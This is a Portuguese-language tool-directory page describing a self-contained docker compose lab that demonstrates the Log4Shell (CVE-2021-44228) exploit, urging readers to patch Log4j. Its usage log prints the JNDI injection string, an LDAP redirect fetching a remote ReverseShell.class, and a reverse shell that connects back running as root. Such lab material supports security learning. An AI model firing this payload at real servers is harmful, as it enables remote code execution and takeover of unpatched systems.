Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228-PoC — Ambiente de laboratório autocontido que executa o exploit com segurança, tudo a partir do docker compose. | Kitploit
Ferramentas/GitHubGitHub/j3kz/cve-2021-44228-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubj3kz/cve-2021-44228-poc

CVE-2021-44228-PoC

Ambiente de laboratório autocontido que executa o exploit com segurança, tudo a partir do docker compose.

Ver Repositório
4há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ambiente de laboratório autocontido PoC que executa um reverse-shell com Log4Shell (CVE-2021-44228)

Este é um ambiente de laboratório autocontido que executa o exploit com segurança, tudo a partir do docker compose.

As versões afetadas são Apache Log4j <=2.0–2.14.1 e o CVE é rastreado como CVE-2021-44228 (pontuação CVSS: 10.0).

Corrija o Apache Log4j para a versão 2.16+ o mais rápido possível !!!

Pré-requisitos

Este código requer Docker e Docker Compose.

Descrição

Os arquivos Dockerfile e docker-compose.yml são autoexplicativos para construir e iniciar o ambiente de laboratório.

O servidor vítima log4shell-server é construído usando o projeto demo do spring initializr, incluindo a versão vulnerável Log4j 2.14.1 através do spring-boot-starter-log4j2 2.6.1.

O código vulnerável está localizado dentro de DemoApplication.java.

A Execução Remota de Código é servida pelo rce-server.

O servidor LDAP intermediário é baseado em Java Unmarshaller Security - Turning your data into code execution.

O vetor de ataque é executado a partir deste script para configurar uma conexão com o servidor reverse-shell.

O servidor reverse-shell aguarda uma conexão e envia um exemplo de comando echo $(whoami) através do reverse shell, que é executado no servidor vítima log4shell-server.

Uso:

git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
ldap-server       | Listening on 0.0.0.0:1389

Servidor LDAP pronto e ouvindo.

reverse-shell     | listening on [::]:4242 ...

Servidor reverse-shell pronto e ouvindo.

log4shell-server  |
log4shell-server  |   .   ____          _            __ _ _
log4shell-server  |  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
log4shell-server  | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server  |  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
log4shell-server  |   '  |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server  |  =========|_|==============|___/=/_/_/_/
log4shell-server  |  :: Spring Boot ::                (v2.6.1)
log4shell-server  |
log4shell-server  | 2021-12-18 12:31:37.695  INFO 1 --- [           main] c.e.d.DemoApplication                    : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server  | 2021-12-18 12:31:37.739  INFO 1 --- [           main] c.e.d.DemoApplication                    : No active profile set, falling back to default profiles: default
log4shell-server  | 2021-12-18 12:31:42.337  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat initialized with port(s): 8080 (http)
log4shell-server  | 2021-12-18 12:31:42.439  INFO 1 --- [           main] o.a.c.c.StandardService                  : Starting service [Tomcat]
log4shell-server  | 2021-12-18 12:31:42.440  INFO 1 --- [           main] o.a.c.c.StandardEngine                   : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server  | 2021-12-18 12:31:42.717  INFO 1 --- [           main] o.a.c.c.C.[.[.[/]                        : Initializing Spring embedded WebApplicationContext
log4shell-server  | 2021-12-18 12:31:42.718  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server  | 2021-12-18 12:31:44.660  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''

Servidor vulnerável pronto e ouvindo.

attack-vector     | 👌 log4shell-server:8080 is listening!
attack-vector     | 🚀 Sending attack vector ...

Servidor de ataque aguardando conexão e enviando o vetor de ataque.

log4shell-server  | 2021-12-18 12:31:44.740  INFO 1 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/]                        : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.112  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 2 ms
ldap-server       | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server        | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"

Servidor vulnerável executando solicitação, registrando-a, então o servidor LDAP está solicitando RCE ao servidor RCE.

reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell     | 👻 Hello from the log4shell-server! We are root.
reverse-shell     | listening on [::]:4242 ...
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)

RCE é executado e o servidor vítima está abrindo o reverse shell, e o servidor reverse-shell é capaz de executar comandos remotos.

log4shell-server  | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello  param:name: ReverseShell@22fb868
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:host: log4shell-server:8080
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:user-agent: curl/7.80.0
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:accept: */*

Servidor vítima está registrando a solicitação do vetor de ataque.

attack-vector     | 🔥 Server returned:
attack-vector     | > HTTP/1.1 200
attack-vector     | > Content-Type: text/plain;charset=UTF-8
attack-vector     | > Content-Length: 52
attack-vector     | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector     | >
attack-vector     | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector     | Attack should be successfull, have a nice day!

A solicitação do vetor de ataque está registrando a resposta e encerra a festa.

Aviso Legal

Este repositório é apenas sobre aprendizado da vulnerabilidade.

O projeto não se destina a ser e não pode ser usado como uma exploração maliciosa do CVE-2021-44228 sem o consentimento do proprietário do servidor vítima.

Qualquer uso para atividades maliciosas é proibido e punido por leis severas.

Baixar ferramenta